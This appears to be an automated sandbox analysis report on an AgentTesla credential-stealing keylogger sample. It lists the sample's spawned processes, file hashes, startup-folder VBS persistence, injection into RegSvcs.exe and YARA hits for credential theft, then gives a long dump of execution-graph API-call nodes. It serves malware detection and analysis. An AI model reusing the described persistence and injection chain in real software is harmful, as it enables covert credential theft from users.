                                    • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 45%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:11:03:01
                                    Start date:06/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SAL987656700.exe"
                                    Imagebase:0x2e0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:11:03:13
                                    Start date:06/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                                    Imagebase:0x7ff6fcb90000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:11:03:14
                                    Start date:06/01/2025
                                    Path:C:\Users\user\AppData\Local\enterogenous\cunila.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\enterogenous\cunila.exe"
                                    Imagebase:0x520000
                                    File size:892'416 bytes
                                    MD5 hash:A885A9C7468691538B78D54852B5A59C
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    Target ID:6
                                    Start time:11:03:15
                                    Start date:06/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\enterogenous\cunila.exe"
                                    Imagebase:0x680000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4471177683.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false


                                      Execution Graph

                                      Execution Coverage:2.4%
                                      Dynamic/Decrypted Code Coverage:1.1%
                                      Signature Coverage:5.2%
                                      Total number of Nodes:1624
                                      Total number of Limit Nodes:40
RtlEnterCriticalSection RtlLeaveCriticalSection RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 97919->97934 97920 88fef7 97926 88a8c7 22 API calls 97920->97926 97933 88ed9d messages 97920->97933 97923 8d4600 97929 88a8c7 22 API calls 97923->97929 97923->97933 97924 8d4b0b 97960 8f359c 82 API calls __wsopen_s 97924->97960 97925 88a8c7 22 API calls 97925->97934 97926->97933 97929->97933 97931 88fbe3 97931->97933 97935 8d4bdc 97931->97935 97940 88f3ae messages 97931->97940 97932 88a961 22 API calls 97932->97934 97933->97913 97934->97918 97934->97919 97934->97920 97934->97923 97934->97924 97934->97925 97934->97931 97934->97932 97934->97933 97936 8a00a3 29 API calls pre_c_initialization 97934->97936 97938 8d4beb 97934->97938 97939 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97934->97939 97934->97940 97957 8901e0 207 API calls 2 library calls 97934->97957 97958 8906a0 41 API calls messages 97934->97958 97961 8f359c 82 API calls __wsopen_s 97935->97961 97936->97934 97962 8f359c 82 API calls __wsopen_s 97938->97962 97939->97934 97940->97933 97959 8f359c 82 API calls __wsopen_s 97940->97959 97941->97913 97942->97913 97943->97913 97944->97913 97945->97913 97946->97913 97947->97913 97948->97913 97949->97913 97950->97895 97951->97908 97952->97913 97953->97913 97954->97913 97955->97908 97956->97899 97957->97934 97958->97934 97959->97933 97960->97933 97961->97938 97962->97933 97963 8d2a00 97974 88d7b0 messages 97963->97974 97964 88d9d5 97965 88db11 PeekMessageW 97965->97974 97966 88d807 GetInputState 97966->97965 97966->97974 97967 8d1cbe TranslateAcceleratorW 97967->97974 97969 88db8f PeekMessageW 97969->97974 97970 88da04 timeGetTime 97970->97974 97971 88db73 TranslateMessage DispatchMessageW 97971->97969 97972 88dbaf Sleep 97975 88dbc0 97972->97975 97973 8d2b74 Sleep 97973->97975 97974->97964 97974->97965 97974->97966 97974->97967 97974->97969 97974->97970 97974->97971 97974->97972 97974->97973 97976 
8d1dda timeGetTime 97974->97976 97991 88ec40 207 API calls 97974->97991 97995 88dd50 97974->97995 98002 88dfd0 97974->98002 98030 891310 97974->98030 98087 88bf40 207 API calls 2 library calls 97974->98087 98088 89edf6 IsDialogMessageW GetClassLongW 97974->98088 98090 8f3a2a 23 API calls 97974->98090 98091 8f359c 82 API calls __wsopen_s 97974->98091 97975->97964 97975->97974 97977 89e551 timeGetTime 97975->97977 97980 8d2c0b GetExitCodeProcess 97975->97980 97984 8d2a31 97975->97984 97985 9129bf GetForegroundWindow 97975->97985 97986 8d2ca9 Sleep 97975->97986 98092 905658 23 API calls 97975->98092 98093 8ee97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97975->98093 98094 8ed4dc 47 API calls 97975->98094 98089 89e300 23 API calls 97976->98089 97977->97975 97982 8d2c37 CloseHandle 97980->97982 97983 8d2c21 WaitForSingleObject 97980->97983 97982->97975 97983->97974 97983->97982 97984->97964 97985->97975 97986->97974 97991->97974 97996 88dd6f 97995->97996 97997 88dd83 97995->97997 98095 88d260 207 API calls 2 library calls 97996->98095 98096 8f359c 82 API calls __wsopen_s 97997->98096 98000 88dd7a 98000->97974 98001 8d2f75 98001->98001 98004 88e010 98002->98004 98003 8d2f7a 98005 88ec40 207 API calls 98003->98005 98004->98003 98007 88e075 98004->98007 98006 8d2f8c 98005->98006 98024 88e0dc messages 98006->98024 98099 8f359c 82 API calls __wsopen_s 98006->98099 98007->98024 98100 8a0242 5 API calls __Init_thread_wait 98007->98100 98011 8d2fca 98013 88a961 22 API calls 98011->98013 98011->98024 98012 88a961 22 API calls 98012->98024 98016 8d2fe4 98013->98016 98101 8a00a3 29 API calls __onexit 98016->98101 98018 8d2fee 98102 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98018->98102 98021 88ec40 207 API calls 98021->98024 98023 88a8c7 22 API calls 98023->98024 98024->98012 98024->98021 98024->98023 98025 8904f0 22 API calls 98024->98025 98026 88e3e1 98024->98026 98028 8f359c 82 API calls 98024->98028 
98097 88a81b 41 API calls 98024->98097 98098 89a308 207 API calls 98024->98098 98103 8a0242 5 API calls __Init_thread_wait 98024->98103 98104 8a00a3 29 API calls __onexit 98024->98104 98105 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98024->98105 98106 9047d4 207 API calls 98024->98106 98107 9068c1 207 API calls 98024->98107 98025->98024 98026->97974 98028->98024 98031 8917b0 98030->98031 98032 891376 98030->98032 98265 8a0242 5 API calls __Init_thread_wait 98031->98265 98034 8d6331 98032->98034 98036 891940 9 API calls 98032->98036 98224 90709c 98034->98224 98035 8917ba 98038 8917fb 98035->98038 98041 889cb3 22 API calls 98035->98041 98039 8913a0 98036->98039 98044 8d6346 98038->98044 98046 89182c 98038->98046 98042 891940 9 API calls 98039->98042 98040 8d633d 98040->97974 98050 8917d4 98041->98050 98043 8913b6 98042->98043 98043->98038 98045 8913ec 98043->98045 98270 8f359c 82 API calls __wsopen_s 98044->98270 98045->98044 98069 891408 __fread_nolock 98045->98069 98267 88aceb 23 API calls messages 98046->98267 98049 891839 98268 89d217 207 API calls 98049->98268 98266 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 98050->98266 98053 8d636e 98074 8d6369 98053->98074 98271 8f359c 82 API calls __wsopen_s 98053->98271 98054 89152f 98056 89153c 98054->98056 98057 8d63d1 98054->98057 98059 891940 9 API calls 98056->98059 98273 905745 54 API calls _wcslen 98057->98273 98061 891549 98059->98061 98060 89fddb 22 API calls 98060->98069 98064 8d64fa 98061->98064 98066 891940 9 API calls 98061->98066 98062 891872 98062->98034 98269 89faeb 23 API calls 98062->98269 98063 89fe0b 22 API calls 98063->98069 98064->98074 98274 8f359c 82 API calls __wsopen_s 98064->98274 98070 891563 98066->98070 98068 88ec40 207 API calls 98068->98069 98069->98049 98069->98053 98069->98054 98069->98060 98069->98063 98069->98068 98071 8d63b2 98069->98071 98069->98074 98070->98064 98073 88a8c7 22 API calls 98070->98073 98076 8915c7 messages 
98070->98076 98272 8f359c 82 API calls __wsopen_s 98071->98272 98073->98076 98074->97974 98075 891940 9 API calls 98075->98076 98076->98062 98076->98064 98076->98074 98076->98075 98079 89167b messages 98076->98079 98108 90e204 98076->98108 98144 8ff0ec 98076->98144 98153 8f744a 98076->98153 98209 8f83da 98076->98209 98212 886246 98076->98212 98216 90958b 98076->98216 98219 886216 98076->98219 98077 89171d 98077->97974 98079->98077 98264 89ce17 22 API calls messages 98079->98264 98087->97974 98088->97974 98089->97974 98090->97974 98091->97974 98092->97975 98093->97975 98094->97975 98095->98000 98096->98001 98097->98024 98098->98024 98099->98024 98100->98011 98101->98018 98102->98024 98103->98024 98104->98024 98105->98024 98106->98024 98107->98024 98109 88a961 22 API calls 98108->98109 98110 90e21b 98109->98110 98111 887510 53 API calls 98110->98111 98112 90e22a 98111->98112 98113 886270 22 API calls 98112->98113 98114 90e23d 98113->98114 98115 887510 53 API calls 98114->98115 98116 90e24a 98115->98116 98117 90e262 98116->98117 98118 90e2c7 98116->98118 98294 88b567 39 API calls 98117->98294 98119 887510 53 API calls 98118->98119 98121 90e2cc 98119->98121 98123 90e314 98121->98123 98124 90e2d9 98121->98124 98122 90e267 98122->98124 98126 90e280 98122->98126 98130 90e32c 98123->98130 98298 88b567 39 API calls 98123->98298 98297 889c6e 22 API calls 98124->98297 98295 886d25 22 API calls __fread_nolock 98126->98295 98129 90e28d 98133 886350 22 API calls 98129->98133 98134 90e345 98130->98134 98299 88b567 39 API calls 98130->98299 98132 88a8c7 22 API calls 98135 90e35f 98132->98135 98136 90e29b 98133->98136 98134->98132 98275 8e92c8 98135->98275 98296 886d25 22 API calls __fread_nolock 98136->98296 98139 90e2b4 98140 886350 22 API calls 98139->98140 98143 90e2c2 98140->98143 98141 90e2e6 98141->98076 98300 8862b5 22 API calls 98143->98300 98145 887510 53 API calls 98144->98145 98146 8ff126 98145->98146 98313 889e90 98146->98313 98148 8ff136 98149 8ff15b 98148->98149 
98150 88ec40 207 API calls 98148->98150 98152 8ff15f 98149->98152 98341 889c6e 22 API calls 98149->98341 98150->98149 98152->98076 98154 8f7474 98153->98154 98155 8f7469 98153->98155 98159 88a961 22 API calls 98154->98159 98196 8f7554 98154->98196 98357 88b567 39 API calls 98155->98357 98157 89fddb 22 API calls 98158 8f7587 98157->98158 98160 89fe0b 22 API calls 98158->98160 98161 8f7495 98159->98161 98162 8f7598 98160->98162 98163 88a961 22 API calls 98161->98163 98164 886246 CloseHandle 98162->98164 98165 8f749e 98163->98165 98166 8f75a3 98164->98166 98167 887510 53 API calls 98165->98167 98169 88a961 22 API calls 98166->98169 98168 8f74aa 98167->98168 98358 88525f 22 API calls 98168->98358 98171 8f75ab 98169->98171 98173 886246 CloseHandle 98171->98173 98172 8f74bf 98174 886350 22 API calls 98172->98174 98175 8f75b2 98173->98175 98176 8f74f2 98174->98176 98177 887510 53 API calls 98175->98177 98178 8f754a 98176->98178 98359 8ed4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 98176->98359 98179 8f75be 98177->98179 98361 88b567 39 API calls 98178->98361 98181 886246 CloseHandle 98179->98181 98184 8f75c8 98181->98184 98183 8f7502 98183->98178 98185 8f7506 98183->98185 98349 885745 98184->98349 98186 889cb3 22 API calls 98185->98186 98189 8f7513 98186->98189 98360 8ed2c1 26 API calls 98189->98360 98190 8f76de GetLastError 98193 8f76f7 98190->98193 98191 8f75ea 98362 8853de 27 API calls messages 98191->98362 98195 886216 CloseHandle 98193->98195 98207 8f76a4 98195->98207 98196->98157 98196->98207 98197 8f75f8 98363 8853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98197->98363 98198 8f751c 98198->98178 98200 8f7645 98201 89fddb 22 API calls 98200->98201 98203 8f7679 98201->98203 98202 8f75ff 98202->98200 98364 8eccff 98202->98364 98205 88a961 22 API calls 98203->98205 98206 8f7686 98205->98206 98206->98207 98368 8e417d 22 API calls __fread_nolock 98206->98368 98207->98076 98371 8f98e3 98209->98371 98211 8f83ea 98211->98076 98213 88625f 98212->98213 
98214 886250 98212->98214 98213->98214 98215 886264 CloseHandle 98213->98215 98214->98076 98215->98214 98432 907f59 98216->98432 98218 90959b 98218->98076 98220 886246 CloseHandle 98219->98220 98221 88621e 98220->98221 98222 886246 CloseHandle 98221->98222 98223 88622d messages 98222->98223 98223->98076 98225 9070f5 98224->98225 98226 9070db 98224->98226 98516 905689 98225->98516 98527 8f359c 82 API calls __wsopen_s 98226->98527 98230 88ec40 206 API calls 98231 907164 98230->98231 98232 9071a6 98231->98232 98233 9071ff 98231->98233 98236 9070ed 98231->98236 98242 8f0acc 22 API calls 98232->98242 98234 907253 98233->98234 98235 907205 98233->98235 98234->98236 98237 887510 53 API calls 98234->98237 98528 8f1119 22 API calls 98235->98528 98236->98040 98238 907265 98237->98238 98240 88aec9 22 API calls 98238->98240 98243 907289 CharUpperBuffW 98240->98243 98241 907228 98529 88a673 22 API calls 98241->98529 98245 9071de 98242->98245 98248 9072a3 98243->98248 98247 891310 206 API calls 98245->98247 98246 907230 98530 88bf40 207 API calls 2 library calls 98246->98530 98247->98236 98249 9072f6 98248->98249 98250 9072aa 98248->98250 98251 887510 53 API calls 98249->98251 98523 8f0acc 98250->98523 98253 9072fe 98251->98253 98531 89e300 23 API calls 98253->98531 98257 891310 206 API calls 98257->98236 98258 907308 98258->98236 98259 887510 53 API calls 98258->98259 98260 907323 98259->98260 98532 88a673 22 API calls 98260->98532 98262 907333 98533 88bf40 207 API calls 2 library calls 98262->98533 98264->98079 98265->98035 98266->98038 98267->98049 98268->98062 98269->98062 98270->98074 98271->98074 98272->98074 98273->98070 98274->98074 98276 88a961 22 API calls 98275->98276 98277 8e92de 98276->98277 98278 886270 22 API calls 98277->98278 98279 8e92f2 98278->98279 98285 8e9314 98279->98285 98301 8e8e54 98279->98301 98281 8e8e54 41 API calls 98281->98285 98285->98281 98286 8e93b3 98285->98286 98287 886350 22 API calls 98285->98287 98290 8e9397 98285->98290 98309 886d25 22 API 
calls __fread_nolock 98285->98309 98288 88a8c7 22 API calls 98286->98288 98289 8e93c2 98286->98289 98287->98285 98288->98289 98289->98143 98310 886d25 22 API calls __fread_nolock 98290->98310 98292 8e93a7 98293 886350 22 API calls 98292->98293 98293->98286 98294->98122 98295->98129 98296->98139 98297->98141 98298->98130 98299->98134 98300->98141 98303 8e8e74 _wcslen 98301->98303 98302 8e8f63 98302->98285 98308 886d25 22 API calls __fread_nolock 98302->98308 98303->98302 98304 8e8f68 98303->98304 98305 8e8ea9 98303->98305 98304->98302 98312 89ce60 41 API calls 98304->98312 98305->98302 98311 89ce60 41 API calls 98305->98311 98308->98285 98309->98285 98310->98292 98311->98305 98312->98304 98314 886270 22 API calls 98313->98314 98340 889eb5 98314->98340 98315 889fd2 98316 88a4a1 22 API calls 98315->98316 98317 889fec 98316->98317 98317->98148 98320 88a6c3 22 API calls 98320->98340 98321 8cf7c4 98347 8e96e2 84 API calls __wsopen_s 98321->98347 98322 8cf699 98329 89fddb 22 API calls 98322->98329 98323 88a405 98323->98317 98348 8e96e2 84 API calls __wsopen_s 98323->98348 98324 88a4a1 22 API calls 98324->98340 98328 8cf7d2 98330 88a4a1 22 API calls 98328->98330 98331 8cf754 98329->98331 98332 8cf7e8 98330->98332 98333 89fe0b 22 API calls 98331->98333 98332->98317 98334 88a12c __fread_nolock 98333->98334 98334->98321 98334->98323 98336 88a587 22 API calls 98336->98340 98337 88aec9 22 API calls 98338 88a0db CharUpperBuffW 98337->98338 98343 88a673 22 API calls 98338->98343 98340->98315 98340->98320 98340->98321 98340->98322 98340->98323 98340->98324 98340->98334 98340->98336 98340->98337 98342 884573 41 API calls _wcslen 98340->98342 98344 8848c8 23 API calls 98340->98344 98345 8849bd 22 API calls __fread_nolock 98340->98345 98346 88a673 22 API calls 98340->98346 98341->98152 98342->98340 98343->98340 98344->98340 98345->98340 98346->98340 98347->98328 98348->98317 98350 88575c CreateFileW 98349->98350 98351 8c4035 98349->98351 98352 88577b 98350->98352 98351->98352 98353 
8c403b CreateFileW 98351->98353 98352->98190 98352->98191 98353->98352 98354 8c4063 98353->98354 98369 8854c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98354->98369 98356 8c406e 98356->98352 98357->98154 98358->98172 98359->98183 98360->98198 98361->98196 98362->98197 98363->98202 98365 8ecd0e 98364->98365 98366 8ecd19 WriteFile 98364->98366 98370 8ecc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98365->98370 98366->98200 98368->98207 98369->98356 98370->98366 98372 8f99e8 98371->98372 98373 8f9902 98371->98373 98428 8f9caa 39 API calls 98372->98428 98374 89fddb 22 API calls 98373->98374 98376 8f9909 98374->98376 98378 89fe0b 22 API calls 98376->98378 98377 8f99ca 98377->98211 98379 8f991a 98378->98379 98381 886246 CloseHandle 98379->98381 98380 8f9ac5 98422 8f1e96 98380->98422 98383 8f9925 98381->98383 98386 88a961 22 API calls 98383->98386 98384 8f9acc 98391 8eccff 4 API calls 98384->98391 98385 8f99a2 98385->98377 98385->98380 98387 8f9a33 98385->98387 98388 8f992d 98386->98388 98389 887510 53 API calls 98387->98389 98390 886246 CloseHandle 98388->98390 98396 8f9a3a 98389->98396 98392 8f9934 98390->98392 98400 8f9aa8 98391->98400 98393 887510 53 API calls 98392->98393 98395 8f9940 98393->98395 98394 8f9abb 98430 8ecd57 30 API calls 98394->98430 98398 886246 CloseHandle 98395->98398 98396->98394 98414 8f9a6e 98396->98414 98401 8f994a 98398->98401 98399 886270 22 API calls 98402 8f9a7e 98399->98402 98400->98377 98403 886246 CloseHandle 98400->98403 98404 885745 5 API calls 98401->98404 98405 8f9a8e 98402->98405 98409 88a8c7 22 API calls 98402->98409 98406 8f9b1e 98403->98406 98408 8f9959 98404->98408 98410 8833c6 22 API calls 98405->98410 98407 886216 CloseHandle 98406->98407 98407->98377 98411 8f995d 98408->98411 98412 8f99c2 98408->98412 98409->98405 98413 8f9a9c 98410->98413 98426 8853de 27 API calls messages 98411->98426 98415 886216 CloseHandle 98412->98415 98429 8ecd57 30 API calls 98413->98429 98414->98399 98415->98377 98418 8f996b 98427 
8853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98418->98427 98420 8f9972 98420->98385 98421 8eccff 4 API calls 98420->98421 98421->98385 98423 8f1e9f 98422->98423 98425 8f1ea4 98422->98425 98431 8f0f67 24 API calls __fread_nolock 98423->98431 98425->98384 98426->98418 98427->98420 98428->98385 98429->98400 98430->98400 98431->98425 98433 887510 53 API calls 98432->98433 98434 907f90 98433->98434 98458 907fd5 messages 98434->98458 98470 908cd3 98434->98470 98436 908281 98437 90844f 98436->98437 98441 90828f 98436->98441 98511 908ee4 60 API calls 98437->98511 98440 90845e 98440->98441 98442 90846a 98440->98442 98483 907e86 98441->98483 98442->98458 98443 887510 53 API calls 98460 908049 98443->98460 98448 9082c8 98498 89fc70 98448->98498 98451 908302 98505 8863eb 22 API calls 98451->98505 98452 9082e8 98504 8f359c 82 API calls __wsopen_s 98452->98504 98455 9082f3 GetCurrentProcess TerminateProcess 98455->98451 98456 908311 98506 886a50 22 API calls 98456->98506 98458->98218 98459 90832a 98468 908352 98459->98468 98507 8904f0 22 API calls 98459->98507 98460->98436 98460->98443 98460->98458 98502 8e417d 22 API calls __fread_nolock 98460->98502 98503 90851d 42 API calls _strftime 98460->98503 98461 9084c5 98461->98458 98465 9084d9 FreeLibrary 98461->98465 98463 908341 98508 908b7b 75 API calls 98463->98508 98465->98458 98468->98461 98509 8904f0 22 API calls 98468->98509 98510 88aceb 23 API calls messages 98468->98510 98512 908b7b 75 API calls 98468->98512 98471 88aec9 22 API calls 98470->98471 98472 908cee CharLowerBuffW 98471->98472 98473 8e8e54 41 API calls 98472->98473 98474 908d0f 98473->98474 98476 88a961 22 API calls 98474->98476 98482 908d48 _wcslen 98474->98482 98477 908d2a 98476->98477 98513 886d25 22 API calls __fread_nolock 98477->98513 98479 908d3e 98480 8893b2 22 API calls 98479->98480 98480->98482 98481 908e5e _wcslen 98481->98460 98482->98481 98514 90851d 42 API calls _strftime 98482->98514 98484 907ea1 98483->98484 98488 907eec 98483->98488 
98485 89fe0b 22 API calls 98484->98485 98487 907ec3 98485->98487 98486 89fddb 22 API calls 98486->98487 98487->98486 98487->98488 98489 909096 98488->98489 98490 9092ab messages 98489->98490 98497 9090ba _strcat _wcslen 98489->98497 98490->98448 98491 88b38f 39 API calls 98491->98497 98492 88b567 39 API calls 98492->98497 98493 88b6b5 39 API calls 98493->98497 98494 8aea0c 21 API calls ___std_exception_copy 98494->98497 98495 887510 53 API calls 98495->98497 98497->98490 98497->98491 98497->98492 98497->98493 98497->98494 98497->98495 98515 8eefae 24 API calls _wcslen 98497->98515 98499 89fc85 98498->98499 98500 89fd1d VirtualProtect 98499->98500 98501 89fceb 98499->98501 98500->98501 98501->98451 98501->98452 98502->98460 98503->98460 98504->98455 98505->98456 98506->98459 98507->98463 98508->98468 98509->98468 98510->98468 98511->98440 98512->98468 98513->98479 98514->98481 98515->98497 98517 9056a4 98516->98517 98522 9056f2 98516->98522 98518 89fe0b 22 API calls 98517->98518 98519 9056c6 98518->98519 98520 89fddb 22 API calls 98519->98520 98519->98522 98534 8f0a59 22 API calls 98519->98534 98520->98519 98522->98230 98524 8f0ada 98523->98524 98525 8f0b13 98523->98525 98524->98525 98526 89fddb 22 API calls 98524->98526 98525->98257 98526->98525 98527->98236 98528->98241 98529->98246 98530->98236 98531->98258 98532->98262 98533->98236 98534->98519 98535 881098 98540 8842de 98535->98540 98539 8810a7 98541 88a961 22 API calls 98540->98541 98542 8842f5 GetVersionExW 98541->98542 98543 886b57 22 API calls 98542->98543 98544 884342 98543->98544 98545 8893b2 22 API calls 98544->98545 98559 884378 98544->98559 98546 88436c 98545->98546 98548 8837a0 22 API calls 98546->98548 98547 88441b GetCurrentProcess IsWow64Process 98549 884437 98547->98549 98548->98559 98550 88444f LoadLibraryA 98549->98550 98551 8c3824 GetSystemInfo 98549->98551 98552 88449c GetSystemInfo 98550->98552 98553 884460 GetProcAddress 98550->98553 98554 884476 98552->98554 98553->98552 98556 884470 
GetNativeSystemInfo 98553->98556 98557 88447a FreeLibrary 98554->98557 98558 88109d 98554->98558 98555 8c37df 98556->98554 98557->98558 98560 8a00a3 29 API calls __onexit 98558->98560 98559->98547 98559->98555 98560->98539 98561 8a03fb 98562 8a0407 ___scrt_is_nonwritable_in_current_image 98561->98562 98592 89feb1 98562->98592 98564 8a040e 98565 8a0561 98564->98565 98568 8a0438 98564->98568 98619 8a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98565->98619 98567 8a0568 98620 8a4e52 28 API calls _abort 98567->98620 98581 8a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98568->98581 98603 8b247d 98568->98603 98570 8a056e 98621 8a4e04 28 API calls _abort 98570->98621 98574 8a0576 98622 8a0aea GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 98574->98622 98575 8a0457 98578 8a057c __scrt_common_main_seh 98579 8a04d8 98611 8a0959 98579->98611 98581->98579 98615 8a4e1a 38 API calls 3 library calls 98581->98615 98583 8a04de 98584 8a04f3 98583->98584 98616 8a0992 GetModuleHandleW 98584->98616 98586 8a04fa 98586->98567 98587 8a04fe 98586->98587 98588 8a0507 98587->98588 98617 8a4df5 28 API calls _abort 98587->98617 98618 8a0040 13 API calls 2 library calls 98588->98618 98591 8a050f 98591->98575 98593 89feba 98592->98593 98623 8a0698 IsProcessorFeaturePresent 98593->98623 98595 89fec6 98624 8a2c94 10 API calls 3 library calls 98595->98624 98597 89fecb 98598 89fecf 98597->98598 98625 8b2317 98597->98625 98598->98564 98601 89fee6 98601->98564 98604 8b2494 98603->98604 98605 8a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98604->98605 98606 8a0451 98605->98606 98606->98575 98607 8b2421 98606->98607 98608 8b2450 98607->98608 98609 8a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98608->98609 98610 8b2479 98609->98610 98610->98581 98676 8a2340 98611->98676 98614 8a097f 98614->98583 
98615->98579 98616->98586 98617->98588 98618->98591 98619->98567 98620->98570 98621->98574 98622->98578 98623->98595 98624->98597 98629 8bd1f6 98625->98629 98628 8a2cbd 8 API calls 3 library calls 98628->98598 98632 8bd20f 98629->98632 98633 8bd213 98629->98633 98631 89fed8 98631->98601 98631->98628 98647 8a0a8c 98632->98647 98633->98632 98635 8b4bfb 98633->98635 98636 8b4c07 ___scrt_is_nonwritable_in_current_image 98635->98636 98654 8b2f5e RtlEnterCriticalSection 98636->98654 98638 8b4c0e 98655 8b50af 98638->98655 98640 8b4c1d 98646 8b4c2c 98640->98646 98668 8b4a8f 29 API calls 98640->98668 98643 8b4c27 98669 8b4b45 GetStdHandle GetFileType 98643->98669 98645 8b4c3d __wsopen_s 98645->98633 98670 8b4c48 RtlLeaveCriticalSection _abort 98646->98670 98648 8a0a97 IsProcessorFeaturePresent 98647->98648 98649 8a0a95 98647->98649 98651 8a0c5d 98648->98651 98649->98631 98675 8a0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98651->98675 98653 8a0d40 98653->98631 98654->98638 98656 8b50bb ___scrt_is_nonwritable_in_current_image 98655->98656 98657 8b50c8 98656->98657 98658 8b50df 98656->98658 98672 8af2d9 20 API calls _free 98657->98672 98671 8b2f5e RtlEnterCriticalSection 98658->98671 98661 8b50cd 98673 8b27ec 26 API calls pre_c_initialization 98661->98673 98663 8b50d7 __wsopen_s 98663->98640 98664 8b5117 98674 8b513e RtlLeaveCriticalSection _abort 98664->98674 98665 8b50eb 98665->98664 98667 8b5000 __wsopen_s 21 API calls 98665->98667 98667->98665 98668->98643 98669->98646 98670->98645 98671->98665 98672->98661 98673->98663 98674->98663 98675->98653 98677 8a096c GetStartupInfoW 98676->98677 98677->98614 98678 88f7bf 98679 88f7d3 98678->98679 98680 88fcb6 98678->98680 98682 88fcc2 98679->98682 98683 89fddb 22 API calls 98679->98683 98715 88aceb 23 API calls messages 98680->98715 98716 88aceb 23 API calls messages 98682->98716 98685 88f7e5 98683->98685 98685->98682 98686 88f83e 98685->98686 98687 88fd3d 98685->98687 98689 891310 
